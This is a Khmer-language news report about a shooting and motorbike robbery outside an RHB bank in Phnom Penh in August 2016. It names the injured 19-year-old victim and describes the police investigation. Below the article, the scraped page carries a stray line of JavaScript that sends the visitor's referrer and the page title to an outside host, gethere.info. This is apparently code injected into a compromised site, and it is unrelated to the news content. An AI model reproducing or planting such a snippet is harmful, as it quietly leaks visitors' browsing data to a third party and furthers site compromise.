ប្លន់ទៀតហេីយ!បាញ់២គ្រាប់ប្លន់យកម៉ូតូទៅបាត់បន្សល់ជនរងគ្រោះសន្លប់ក្នងថ្កុកឈាមនៅខណ្ឌចំការមនមុខធនាគារRHB

ភ្នំពេញ៖ ៤ថ្ងៃជាប់គ្នាក្រុមចោរប្លន់អុកឡុកកក្រេីកទូទាំងរាជធានីភ្នំពេញបង្កការភ័យខ្លាចដល់ប្រជាពលរដ្ឋ ជាក់ស្តែង ក្រុមចោរបានបាញ់ជនរងគ្រោះអោយដួលសន្លប់ភ្លាមៗនៅក្នុងថ្លុកឈាមកន្លែងកើតហេតុករណីប្លន់យកម៉ូតូកាលពីវេលាម៉ោង១និង២០នាទីរំលងអាធ្រាត្រឈានចូលថ្ងៃទី១០ ខែសីហា ឆ្នាំ២០១៦ នៅចំណុចមុខធនាគារRHB ផ្លូវសីហនុកែង១១៣ សង្កាត់បឹងកេងកង២ ខណ្ឌចំការមន យកម៉ូតូ១គ្រឿងម៉ាក Honda C១២៥ ពណ៌ខ្មៅ ស៊េរី២០១៦ ស្លាកលេខ ភ្នំពេញ ១៦៤៥ មិនចាំអក្សរ ។

ប្រភពអោយដឹងថា ជនរងគ្រោះឈ្មោះ ប៊ិន ថាវ៉ាត់ ភេទប្រុស ១៩ឆ្នាំ បុគ្គលឹកសណ្ឋាគារV ស្នាក់នៅផ្ទះជួល ផ្លូវរថភ្លើង ខណ្ឌទួលគោក រងរបួសចំភ្លៅឆ្វេង១គ្រាប់ និងស្មាស្តាំ១គ្រាប់ បច្ចុប្បន្នបញ្ជូនទៅមន្ទីរពេទ្យកាល់ម៉ែត រីឯភិនភាគជនសង្ស័យមិនមានសាក្សីណាបានឃើញនោះទេ។

 

សមត្ថកិច្ចបានអោយដឹងថាៈ មុនពេលកើតហេតុជនរងគ្រោះនិងបងប្អូនមិត្តភក្តិបានផឹកសុីនៅកោះពេជ្រតែពេលគិតលុយ ខ្វះលុយទើបជនរងគ្រោះជិះម៉ូតូចេញមកម្នាក់ឯងក្នុងបំណងមកដកលុយនៅទូរATM កន្លែងកើតហេតុ ទើបមានជនសង្ស័យមកធ្វើសកម្មភាពបាញ់ប្លន់យកម៉ូតូតែម្តង។

 

បច្ចុប្បន្នកំលាំងជំនាញកំពុងស្រាវជ្រាវកំណត់មុខសញ្ញាតាមរយះកាំមេរ៉ាសុវត្ថិភាពនៅកន្លែងកើតហេតុនោះផងដែរ៕

images.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More